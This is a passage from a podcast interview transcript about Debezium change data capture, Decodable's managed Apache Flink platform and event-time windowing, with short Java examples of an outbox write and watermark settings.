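            outbox.setString(2, payloadJson);
            outbox.executeUpdate();
            conn.commit();
        } catch (SQLException e) {
            conn.rollback();
            throw e;
        }
    }
}
```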

Chris Engelbert: So yeah, absolutely a great tool. Love it. It supports many, many databases. Any idea how many so far?

Gunnar Morling: It keeps growing. Certainly 10 or so, or more. The interesting thing there is, well, there is no standardized way you could implement something like Debezium. Each of the databases has its own APIs and formats, its own ways of extracting those change events, which means there needs to be a dedicated Debezium connector for each database we want to support. The core team added support for MySQL, Postgres, SQL Server, Oracle, Cassandra, MongoDB, and so on. But then what happened is that other companies and organizations also picked up the Debezium framework. So for instance, something like Google Cloud Spanner is now also supported via Debezium, because the team at Google decided they wanted to expose change events based on the Debezium event format and infrastructure. Or ScyllaDB: they maintain their own CDC connector, but it's based on Debezium. And the nice thing about that is that it gives you, as a user, one unified change event format. You don't have to care which particular source database an event comes from; does it come from Cloud Spanner, or does it come from Postgres? You can process those events in a unified way, which I think is just great to see. It has established itself as a sort of de facto standard, I would say.

Chris Engelbert: Yeah, I think that is important. That is a very, very good point. Debezium basically defined a JSON and, I think, an Avro standard.

Gunnar Morling: Right. So I mean, you know, it defines the, let’s say, the semantic structure, like, you know, what are the fields, what are the types, how are they organized, and then how you serialize it as Avro, JSON, or protocol buffers. That’s essentially like a pluggable concern.

Chris Engelbert: Right. So we said earlier, Decodable is a cloud platform. So you basically have, to put it in slightly flippant terms, Apache Flink on steroids, ready to use, plus a couple of things on top of that. So maybe talk a little bit about that.

Gunnar Morling: Right. So yes, that's the underlying tech, I would say. And then, of course, if you want to put those things into production, there are so many things you need to consider. How do you go about developing and versioning those SQL statements? If you iterate on a statement, you maybe want a preview, to get a feeling for it, or maybe just validation. So we have all this editing experience, preview. Then maybe you don't want all of the users in your organization to be able to access all the streaming pipelines you have, so you want something like role-based access control. You want managed connectors. You want automatic provisioning and sizing of your infrastructure, so you don't have to think too much about, "hey, do I need to keep five machines for this dataflow sitting around? And what happens if I don't need them? Do I need to remove them and then scale them back up again?" All this auto-scaling and auto-provisioning is something which we do. We primarily let you use SQL to define your queries, but we also actually let you run your own custom Flink jobs, if that's something you want to do. And we are very close to having Python, PyFlink support (again, by the time this is released, it should be live already), and many, many more things. So really, it's a managed experience for those dataflows.

Chris Engelbert: Right. That makes a lot of sense. So let me see. From a user's perspective, I'm mostly working with SQL. I'm writing my jobs and deploying them. Those jobs are everything from simple ETL, extract, transform, load... what's the L again?

Gunnar Morling: Load.

Chris Engelbert: There you go. Nobody needs to load data. They just magically appear. But you can also do data enrichment. You said that earlier. You can do joins. Right. So is there anything I have to be aware of that is very complicated compared to just using a standard database?

Gunnar Morling: Yeah. I mean, I think this entire notion of event time definitely is something which can be challenging. So let's say you want to do some sort of windowed analysis, like, how many purchase orders do I have per category and hour, this kind of thing. Now, depending on the source of your data, those events might arrive out of order. So it might be that your hour has closed, but then, five minutes later, because some event was stuck in some queue, you still get an event for that past hour. And of course, now there's this tradeoff between, okay, how accurate do you want your data to be, essentially, how long do you want to wait for those late events, versus, well, what is your latency? Do you want to get the updated count out at the top of the hour, or can you afford to wait for those five minutes? So there's a bit of a tradeoff. This entire complex of event time, I think, is certainly something where people often need at least some time to learn and grasp the concepts.
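That tradeoff maps onto two knobs in Flink's DataStream API, sketched below with illustrative names: the watermark delay decides how long to wait for stragglers before a window's result is emitted, and allowed lateness lets an already-emitted window still be updated.

```java
import java.time.Duration;
import org.apache.flink.api.common.eventtime.WatermarkStrategy;
import org.apache.flink.api.common.functions.AggregateFunction;
import org.apache.flink.streaming.api.datastream.DataStream;
import org.apache.flink.streaming.api.windowing.assigners.TumblingEventTimeWindows;
import org.apache.flink.streaming.api.windowing.time.Time;

public class LatenessTradeoff {

    record Order(String category, long timestampMillis) {}

    static class CountOrders implements AggregateFunction<Order, Long, Long> {
        @Override public Long createAccumulator() { return 0L; }
        @Override public Long add(Order value, Long acc) { return acc + 1; }
        @Override public Long getResult(Long acc) { return acc; }
        @Override public Long merge(Long a, Long b) { return a + b; }
    }

    static void countPerCategoryAndHour(DataStream<Order> orders) {
        orders
                // Wait up to 5 minutes for out-of-order events: better accuracy,
                // but an hour's result is only emitted 5 minutes after it ends.
                .assignTimestampsAndWatermarks(
                        WatermarkStrategy.<Order>forBoundedOutOfOrderness(Duration.ofMinutes(5))
                                .withTimestampAssigner((order, ts) -> order.timestampMillis()))
                .keyBy(Order::category)
                .window(TumblingEventTimeWindows.of(Time.hours(1)))
                // Stragglers within this bound update the already-emitted window
                // instead of being dropped.
                .allowedLateness(Time.minutes(5))
                .aggregate(new CountOrders())
                .print();
    }
}
```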

Chris Engelbert: Yeah, that’s a very good one. In a previous episode, we had the discussion about connected cars. And connected cars may or may not have an internet connection all the time. So you like super, super late events sometimes. All right. Because we’re almost running out of time.

Gunnar Morling: Wow. Ok.

Chris Engelbert: Yeah. 20 minutes is like nothing. What is the biggest trend you see right now in terms of database, in terms of cloud, in terms of whatever you like?

Gunnar Morling: Right. I mean, that’s a tough one. Well, I guess there can only be one answer, right? It has to be AI. I feel it’s like, I know it’s boring. But well, the trend is not boring. But saying it is kind of boring. But I mean, that’s what I would see. The way I could see this impact things like we do, I mean, it could help you just with like scaling, of course, like, you know, we could make intelligent predictions about what’s your workload like, maybe we can take a look at the data and we can sense, okay, you know, it might make sense to scale out some more compute load already, because we will know with a certain likelihood that it may be needed very shortly. I could see that then, of course, I mean, it could just help you with authoring those flows, right? I mean, with all those LLMs, it might be doable to give you some sort of guided experience there. So that’s a big trend for sure. Then I guess another one, I would see more technical, I feel like that’s a unification happening, right, of systems and categories of systems. So right now we have, you know, databases here, stream processing engines there. And I feel those things might come more closely together. And you would have real-time streaming capabilities also in something like Postgres itself. And I know maybe would expose Postgres as a Kafka broker, in a sense. So I could also see some more, you know, some closer integration of those different kinds of tools.

Chris Engelbert: That is interesting, because I also think that there is a general movement there. I mean, in the past we had the idea of moving to different databases, because all of them were very specific. And now all of the big databases, Oracle, Postgres, well, even MySQL, are starting to integrate all of those multi-model features. And Postgres is at the forefront, having this super extensibility. So yeah, that would be interesting.

Gunnar Morling: Right. I mean, it’s always going in cycles, I feel right. And even having this trend to decomposition, like it gives you all those good building blocks, which you then can put together and I know create a more cohesive integrated experience, right. And then I guess in five years, we want to tear it apart again, and like, let people integrate everything themselves.

Chris Engelbert: In 5 to 10 years, we'll have the next iteration of microservices. We called it SOAP, we called it whatever. Now we call it microservices. Who knows what we will call it in the future. All right. Thank you very much. That was a good chat. As always, I love talking with you.

Gunnar Morling: Yeah, thank you so much for having me. This was great. I enjoyed the conversation. Let's talk soon.

Chris Engelbert: Absolutely. And for everyone else, come back next week. A new episode, a new guest. And thank you very much. See you.
